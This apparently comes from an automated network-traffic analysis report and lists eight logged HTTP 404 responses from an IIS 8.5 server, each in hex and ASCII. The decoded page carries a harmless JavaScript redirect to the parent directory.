            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5Date: Fri, 10 Nov 2023 08:29:13 GMTConnection: closeContent-Length: 596Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 76 61 72 20 4c 3d 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2c 44 3d 64 6f 63 75 6d 65 6e 74 2c 61 3d 4c 2e 70 61 74 68 6e 61 6d 65 2c 62 3d 22 22 2c 63 3d 22 2f 22 2c 64 3d 22 6c 65 6e 67 74 68 22 3b 0d 0a 61 3d 61 2e 73 70 6c 69 74 28 63 29 3b 0d 0a 66 6f 72 28 76 61 72 20 69 3d 31 3b 69 3c 61 5b 64 5d 2d 32 3b 69 2b 2b 29 7b 62 2b 3d 63 2b 61 5b 69 5d 3b 7d 0d 0a 62 2b 3d 63 3b 0d 0a 44 2e 77 72 69 74 65 28 22 42 61 63 6b 20 74 6f 20 3c 61 20 68 72 65 66 3d 5c 22 22 2b 62 2b 22 5c 22 3e 22 2b 4c 2e 68 6f 73 74 2b 62 2b 22 3c 2f 61 3e 20 2c 20 77 61 69 74 69 6e 67 2e 2e 2e 2e 2e 22 29 3b 0d 0a 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 4c 2e 68 72 65 66 3d 62 3b 7d 2c 22 32 30 30 22 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"><title>404 - </title></head><body><script type="text/javascript">var L=window.location,D=document,a=L.pathname,b="",c="/",d="length";a=a.split(c);for(var i=1;i<a[d]-2;i++){b+=c+a[i];}b+=c;D.write("Back to <a href=\""+b+"\">"+L.host+b+"</a> , waiting.....");setTimeout(function(){L.href=b;},"200");</script></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5Date: Fri, 10 Nov 2023 08:29:16 GMTConnection: closeContent-Length: 596Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 76 61 72 20 4c 3d 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2c 44 3d 64 6f 63 75 6d 65 6e 74 2c 61 3d 4c 2e 70 61 74 68 6e 61 6d 65 2c 62 3d 22 22 2c 63 3d 22 2f 22 2c 64 3d 22 6c 65 6e 67 74 68 22 3b 0d 0a 61 3d 61 2e 73 70 6c 69 74 28 63 29 3b 0d 0a 66 6f 72 28 76 61 72 20 69 3d 31 3b 69 3c 61 5b 64 5d 2d 32 3b 69 2b 2b 29 7b 62 2b 3d 63 2b 61 5b 69 5d 3b 7d 0d 0a 62 2b 3d 63 3b 0d 0a 44 2e 77 72 69 74 65 28 22 42 61 63 6b 20 74 6f 20 3c 61 20 68 72 65 66 3d 5c 22 22 2b 62 2b 22 5c 22 3e 22 2b 4c 2e 68 6f 73 74 2b 62 2b 22 3c 2f 61 3e 20 2c 20 77 61 69 74 69 6e 67 2e 2e 2e 2e 2e 22 29 3b 0d 0a 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 4c 2e 68 72 65 66 3d 62 3b 7d 2c 22 32 30 30 22 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"><title>404 - </title></head><body><script type="text/javascript">var L=window.location,D=document,a=L.pathname,b="",c="/",d="length";a=a.split(c);for(var i=1;i<a[d]-2;i++){b+=c+a[i];}b+=c;D.write("Back to <a href=\""+b+"\">"+L.host+b+"</a> , waiting.....");setTimeout(function(){L.href=b;},"200");</script></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5Date: Fri, 10 Nov 2023 08:29:19 GMTConnection: closeContent-Length: 596Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 76 61 72 20 4c 3d 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2c 44 3d 64 6f 63 75 6d 65 6e 74 2c 61 3d 4c 2e 70 61 74 68 6e 61 6d 65 2c 62 3d 22 22 2c 63 3d 22 2f 22 2c 64 3d 22 6c 65 6e 67 74 68 22 3b 0d 0a 61 3d 61 2e 73 70 6c 69 74 28 63 29 3b 0d 0a 66 6f 72 28 76 61 72 20 69 3d 31 3b 69 3c 61 5b 64 5d 2d 32 3b 69 2b 2b 29 7b 62 2b 3d 63 2b 61 5b 69 5d 3b 7d 0d 0a 62 2b 3d 63 3b 0d 0a 44 2e 77 72 69 74 65 28 22 42 61 63 6b 20 74 6f 20 3c 61 20 68 72 65 66 3d 5c 22 22 2b 62 2b 22 5c 22 3e 22 2b 4c 2e 68 6f 73 74 2b 62 2b 22 3c 2f 61 3e 20 2c 20 77 61 69 74 69 6e 67 2e 2e 2e 2e 2e 22 29 3b 0d 0a 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 4c 2e 68 72 65 66 3d 62 3b 7d 2c 22 32 30 30 22 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"><title>404 - </title></head><body><script type="text/javascript">var L=window.location,D=document,a=L.pathname,b="",c="/",d="length";a=a.split(c);for(var i=1;i<a[d]-2;i++){b+=c+a[i];}b+=c;D.write("Back to <a href=\""+b+"\">"+L.host+b+"</a> , waiting.....");setTimeout(function(){L.href=b;},"200");</script></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5Date: Fri, 10 Nov 2023 08:29:23 GMTConnection: closeContent-Length: 596Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 76 61 72 20 4c 3d 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2c 44 3d 64 6f 63 75 6d 65 6e 74 2c 61 3d 4c 2e 70 61 74 68 6e 61 6d 65 2c 62 3d 22 22 2c 63 3d 22 2f 22 2c 64 3d 22 6c 65 6e 67 74 68 22 3b 0d 0a 61 3d 61 2e 73 70 6c 69 74 28 63 29 3b 0d 0a 66 6f 72 28 76 61 72 20 69 3d 31 3b 69 3c 61 5b 64 5d 2d 32 3b 69 2b 2b 29 7b 62 2b 3d 63 2b 61 5b 69 5d 3b 7d 0d 0a 62 2b 3d 63 3b 0d 0a 44 2e 77 72 69 74 65 28 22 42 61 63 6b 20 74 6f 20 3c 61 20 68 72 65 66 3d 5c 22 22 2b 62 2b 22 5c 22 3e 22 2b 4c 2e 68 6f 73 74 2b 62 2b 22 3c 2f 61 3e 20 2c 20 77 61 69 74 69 6e 67 2e 2e 2e 2e 2e 22 29 3b 0d 0a 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 4c 2e 68 72 65 66 3d 62 3b 7d 2c 22 32 30 30 22 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"><title>404 - </title></head><body><script type="text/javascript">var L=window.location,D=document,a=L.pathname,b="",c="/",d="length";a=a.split(c);for(var i=1;i<a[d]-2;i++){b+=c+a[i];}b+=c;D.write("Back to <a href=\""+b+"\">"+L.host+b+"</a> , waiting.....");setTimeout(function(){L.href=b;},"200");</script></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5Date: Fri, 10 Nov 2023 08:29:57 GMTConnection: closeContent-Length: 596Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 76 61 72 20 4c 3d 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2c 44 3d 64 6f 63 75 6d 65 6e 74 2c 61 3d 4c 2e 70 61 74 68 6e 61 6d 65 2c 62 3d 22 22 2c 63 3d 22 2f 22 2c 64 3d 22 6c 65 6e 67 74 68 22 3b 0d 0a 61 3d 61 2e 73 70 6c 69 74 28 63 29 3b 0d 0a 66 6f 72 28 76 61 72 20 69 3d 31 3b 69 3c 61 5b 64 5d 2d 32 3b 69 2b 2b 29 7b 62 2b 3d 63 2b 61 5b 69 5d 3b 7d 0d 0a 62 2b 3d 63 3b 0d 0a 44 2e 77 72 69 74 65 28 22 42 61 63 6b 20 74 6f 20 3c 61 20 68 72 65 66 3d 5c 22 22 2b 62 2b 22 5c 22 3e 22 2b 4c 2e 68 6f 73 74 2b 62 2b 22 3c 2f 61 3e 20 2c 20 77 61 69 74 69 6e 67 2e 2e 2e 2e 2e 22 29 3b 0d 0a 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 4c 2e 68 72 65 66 3d 62 3b 7d 2c 22 32 30 30 22 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"><title>404 - </title></head><body><script type="text/javascript">var L=window.location,D=document,a=L.pathname,b="",c="/",d="length";a=a.split(c);for(var i=1;i<a[d]-2;i++){b+=c+a[i];}b+=c;D.write("Back to <a href=\""+b+"\">"+L.host+b+"</a> , waiting.....");setTimeout(function(){L.href=b;},"200");</script></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5Date: Fri, 10 Nov 2023 08:30:01 GMTConnection: closeContent-Length: 596Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 76 61 72 20 4c 3d 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2c 44 3d 64 6f 63 75 6d 65 6e 74 2c 61 3d 4c 2e 70 61 74 68 6e 61 6d 65 2c 62 3d 22 22 2c 63 3d 22 2f 22 2c 64 3d 22 6c 65 6e 67 74 68 22 3b 0d 0a 61 3d 61 2e 73 70 6c 69 74 28 63 29 3b 0d 0a 66 6f 72 28 76 61 72 20 69 3d 31 3b 69 3c 61 5b 64 5d 2d 32 3b 69 2b 2b 29 7b 62 2b 3d 63 2b 61 5b 69 5d 3b 7d 0d 0a 62 2b 3d 63 3b 0d 0a 44 2e 77 72 69 74 65 28 22 42 61 63 6b 20 74 6f 20 3c 61 20 68 72 65 66 3d 5c 22 22 2b 62 2b 22 5c 22 3e 22 2b 4c 2e 68 6f 73 74 2b 62 2b 22 3c 2f 61 3e 20 2c 20 77 61 69 74 69 6e 67 2e 2e 2e 2e 2e 22 29 3b 0d 0a 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 4c 2e 68 72 65 66 3d 62 3b 7d 2c 22 32 30 30 22 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"><title>404 - </title></head><body><script type="text/javascript">var L=window.location,D=document,a=L.pathname,b="",c="/",d="length";a=a.split(c);for(var i=1;i<a[d]-2;i++){b+=c+a[i];}b+=c;D.write("Back to <a href=\""+b+"\">"+L.host+b+"</a> , waiting.....");setTimeout(function(){L.href=b;},"200");</script></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5Date: Fri, 10 Nov 2023 08:30:04 GMTConnection: closeContent-Length: 596Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 76 61 72 20 4c 3d 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2c 44 3d 64 6f 63 75 6d 65 6e 74 2c 61 3d 4c 2e 70 61 74 68 6e 61 6d 65 2c 62 3d 22 22 2c 63 3d 22 2f 22 2c 64 3d 22 6c 65 6e 67 74 68 22 3b 0d 0a 61 3d 61 2e 73 70 6c 69 74 28 63 29 3b 0d 0a 66 6f 72 28 76 61 72 20 69 3d 31 3b 69 3c 61 5b 64 5d 2d 32 3b 69 2b 2b 29 7b 62 2b 3d 63 2b 61 5b 69 5d 3b 7d 0d 0a 62 2b 3d 63 3b 0d 0a 44 2e 77 72 69 74 65 28 22 42 61 63 6b 20 74 6f 20 3c 61 20 68 72 65 66 3d 5c 22 22 2b 62 2b 22 5c 22 3e 22 2b 4c 2e 68 6f 73 74 2b 62 2b 22 3c 2f 61 3e 20 2c 20 77 61 69 74 69 6e 67 2e 2e 2e 2e 2e 22 29 3b 0d 0a 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 4c 2e 68 72 65 66 3d 62 3b 7d 2c 22 32 30 30 22 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"><title>404 - </title></head><body><script type="text/javascript">var L=window.location,D=document,a=L.pathname,b="",c="/",d="length";a=a.split(c);for(var i=1;i<a[d]-2;i++){b+=c+a[i];}b+=c;D.write("Back to <a href=\""+b+"\">"+L.host+b+"</a> , waiting.....");setTimeout(function(){L.href=b;},"200");</script></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5Date: Fri, 10 Nov 2023 08:30:07 GMTConnection: closeContent-Length: 596Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 76 61 72 20 4c 3d 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2c 44 3d 64 6f 63 75 6d 65 6e 74 2c 61 3d 4c 2e 70 61 74 68 6e 61 6d 65 2c 62 3d 22 22 2c 63 3d 22 2f 22 2c 64 3d 22 6c 65 6e 67 74 68 22 3b 0d 0a 61 3d 61 2e 73 70 6c 69 74 28 63 29 3b 0d 0a 66 6f 72 28 76 61 72 20 69 3d 31 3b 69 3c 61 5b 64 5d 2d 32 3b 69 2b 2b 29 7b 62 2b 3d 63 2b 61 5b 69 5d 3b 7d 0d 0a 62 2b 3d 63 3b 0d 0a 44 2e 77 72 69 74 65 28 22 42 61 63 6b 20 74 6f 20 3c 61 20 68 72 65 66 3d 5c 22 22 2b 62 2b 22 5c 22 3e 22 2b 4c 2e 68 6f 73 74 2b 62 2b 22 3c 2f 61 3e 20 2c 20 77 61 69 74 69 6e 67 2e 2e 2e 2e 2e 22 29 3b 0d 0a 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 4c 2e 68 72 65 66 3d 62 3b 7d 2c 22 32 30 30 22 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"><title>404 - </title></head><body><script type="text/javascript">var L=window.location,D=document,a=L.pathname,b="",c="/",d="length";a=a.split(c);for(var i=1;i<a[d]-2;i++){b+=c+a[i];}b+=c;D.write("Back to <a href=\""+b+"\">"+L.host+b+"</a> , waiting.....");setTimeout(function(){L.href=b;},"200");</script></body></html>
